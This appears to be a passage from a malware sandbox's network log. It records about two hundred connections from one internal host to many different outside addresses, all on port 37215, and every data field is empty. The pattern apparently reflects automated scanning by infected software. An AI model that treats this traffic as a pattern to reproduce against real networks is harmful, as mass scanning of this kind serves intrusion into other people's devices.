                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7904192.168.2.154526241.188.23.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7905192.168.2.153766841.184.78.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7906192.168.2.153592241.125.227.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7907192.168.2.154699241.192.114.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7908192.168.2.154164241.153.165.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7909192.168.2.155601041.44.113.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7910192.168.2.153681841.5.53.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7911192.168.2.154334041.132.177.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7912192.168.2.153468641.47.17.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7913192.168.2.153861241.241.125.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7914192.168.2.154974441.15.69.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7915192.168.2.155547041.193.79.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7916192.168.2.153588041.149.221.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7917192.168.2.154385241.22.7.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7918192.168.2.155788041.223.97.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7919192.168.2.156087041.6.45.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7920192.168.2.153796841.110.18.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7921192.168.2.154051641.32.124.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7922192.168.2.155797441.174.253.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7923192.168.2.155999041.198.4.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7924192.168.2.155459041.15.210.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7925192.168.2.154812241.159.209.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7926192.168.2.154348641.112.150.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7927192.168.2.156065441.182.228.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7928192.168.2.154005241.181.21.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7929192.168.2.155570041.217.143.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7930192.168.2.155698641.208.34.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7931192.168.2.154241241.45.157.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7932192.168.2.154864441.67.71.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7933192.168.2.153955441.97.3.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7934192.168.2.153487041.4.31.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7935192.168.2.155649841.31.76.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7936192.168.2.154549441.57.141.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7937192.168.2.155942641.16.28.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7938192.168.2.154315241.60.20.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7939192.168.2.153483641.240.218.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7940192.168.2.153852841.250.202.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7941192.168.2.154888841.176.126.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7942192.168.2.155446241.156.44.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7943192.168.2.153874241.96.219.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7944192.168.2.155808641.56.34.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7945192.168.2.153845041.208.55.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7946192.168.2.156090441.114.246.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7947192.168.2.154702241.129.137.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7948192.168.2.154619241.69.199.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7949192.168.2.154459841.117.13.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7950192.168.2.153703241.196.2.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7951192.168.2.154789441.238.113.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7952192.168.2.155961641.53.130.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7953192.168.2.153410241.106.141.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7954192.168.2.155961641.80.12.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7955192.168.2.154898241.242.63.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7956192.168.2.153581241.167.93.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7957192.168.2.153799841.53.203.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7958192.168.2.154631841.135.215.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7959192.168.2.155257241.153.88.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7960192.168.2.154856041.234.13.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7961192.168.2.153929241.226.172.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7962192.168.2.154052441.221.237.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7963192.168.2.154902641.240.100.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7964192.168.2.155443241.186.1.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7965192.168.2.154607441.159.3.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7966192.168.2.155619041.157.215.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7967192.168.2.153883041.94.232.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7968192.168.2.154622241.37.111.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7969192.168.2.155769641.237.248.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7970192.168.2.154491241.4.252.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7971192.168.2.153463041.181.169.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7972192.168.2.155098641.0.224.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7973192.168.2.153831441.20.12.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7974192.168.2.155157441.66.9.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7975192.168.2.155248441.107.48.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7976192.168.2.155541041.108.186.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7977192.168.2.155050841.158.124.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7978192.168.2.154038641.119.81.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7979192.168.2.153351041.96.126.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7980192.168.2.154889041.252.214.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7981192.168.2.155094241.107.182.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7982192.168.2.153745441.47.4.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7983192.168.2.153670841.108.228.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7984192.168.2.153637441.38.62.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7985192.168.2.153881041.251.246.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7986192.168.2.154218041.0.49.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7987192.168.2.155211641.151.217.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7988192.168.2.155369241.211.142.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7989192.168.2.154859441.53.12.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7990192.168.2.154461641.183.136.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7991192.168.2.154686441.75.197.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7992192.168.2.153965841.134.17.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7993192.168.2.155769641.166.0.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7994192.168.2.156046041.242.207.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7995192.168.2.155591041.116.205.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7996192.168.2.155554241.89.15.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7997192.168.2.155208041.215.34.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7998192.168.2.155441041.37.45.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7999192.168.2.155598641.144.9.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8000192.168.2.155956041.250.179.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8001192.168.2.155943841.182.15.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8002192.168.2.155856041.138.12.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8003192.168.2.153457441.127.48.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8004192.168.2.153482641.148.83.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8005192.168.2.155991241.32.6.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8006192.168.2.154679041.164.157.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8007192.168.2.153355041.208.113.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8008192.168.2.155688441.7.32.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8009192.168.2.155021041.207.42.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8010192.168.2.153720441.20.64.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8011192.168.2.154104241.246.199.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8012192.168.2.155716441.238.248.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8013192.168.2.154475241.104.166.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8014192.168.2.154181641.27.66.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8015192.168.2.154598641.24.92.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8016192.168.2.156051841.35.212.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8017192.168.2.154950041.151.43.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8018192.168.2.154428041.98.19.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8019192.168.2.154427641.43.28.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8020192.168.2.155987641.36.149.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8021192.168.2.153855641.192.32.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8022192.168.2.153704841.213.210.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8023192.168.2.154424641.19.46.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8024192.168.2.155475841.255.86.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8025192.168.2.154178441.20.84.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8026192.168.2.154658441.33.100.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8027192.168.2.155109041.244.125.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8028192.168.2.154539041.72.146.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8029192.168.2.155225641.242.129.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8030192.168.2.155712641.239.184.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8031192.168.2.155198241.249.33.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8032192.168.2.154837841.109.112.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8033192.168.2.153353041.195.219.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8034192.168.2.155581641.43.239.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8035192.168.2.153943441.181.84.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8036192.168.2.153431841.122.198.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8037192.168.2.153907641.5.54.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8038192.168.2.155143841.45.155.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8039192.168.2.154615241.246.112.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8040192.168.2.154540041.187.86.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8041192.168.2.155582841.198.14.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8042192.168.2.154759441.1.33.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8043192.168.2.154066641.17.10.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8044192.168.2.155040841.89.148.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8045192.168.2.155747041.62.56.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8046192.168.2.154931441.55.208.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8047192.168.2.155869641.54.139.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8048192.168.2.153913441.234.235.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8049192.168.2.154603241.149.124.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8050192.168.2.155006841.63.112.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8051192.168.2.153741041.131.31.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8052192.168.2.154231841.160.178.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8053192.168.2.155311841.77.143.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8054192.168.2.153688441.108.179.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8055192.168.2.153815041.115.172.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8056192.168.2.155581041.184.67.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8057192.168.2.154441641.181.218.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8058192.168.2.153703441.80.215.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8059192.168.2.155802241.182.137.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8060192.168.2.153425841.137.100.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8061192.168.2.154546841.179.22.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8062192.168.2.155218041.246.67.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8063192.168.2.153489241.243.61.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8064192.168.2.154133441.244.70.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8065192.168.2.153604441.111.241.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8066192.168.2.153850641.154.145.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8067192.168.2.153591841.121.195.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8068192.168.2.155609041.63.243.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8069192.168.2.154138441.111.31.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8070192.168.2.155356041.168.91.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8071192.168.2.154464441.191.187.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8072192.168.2.154210641.253.187.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8073192.168.2.153915641.118.154.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8074192.168.2.154778241.140.87.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8075192.168.2.155706441.228.193.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8076192.168.2.155723241.166.188.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8077192.168.2.154857441.112.210.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8078192.168.2.154714241.238.185.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8079192.168.2.153323841.228.37.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8080192.168.2.154038841.198.199.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8081192.168.2.155467441.21.82.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8082192.168.2.153770041.78.62.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8083192.168.2.153403641.58.61.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8084192.168.2.153964041.64.160.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8085192.168.2.153847241.85.184.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8086192.168.2.154637041.24.188.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8087192.168.2.155650441.183.51.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8088192.168.2.154354841.169.219.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8089192.168.2.153430041.191.42.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8090192.168.2.153308841.68.97.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8091192.168.2.153715641.102.234.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8092192.168.2.155450241.91.134.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8093192.168.2.154246441.105.3.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8094192.168.2.154776641.153.239.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8095192.168.2.153366241.225.110.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8096192.168.2.155292041.227.42.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8097192.168.2.153358841.251.20.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8098192.168.2.155911441.88.225.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8099192.168.2.153693041.235.70.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8100192.168.2.154564041.211.130.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8101192.168.2.153352841.201.100.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8102192.168.2.154620841.45.200.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8103192.168.2.155604041.217.41.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8104192.168.2.154399441.47.157.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8105192.168.2.155918041.172.219.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8106192.168.2.155014241.119.88.14237215
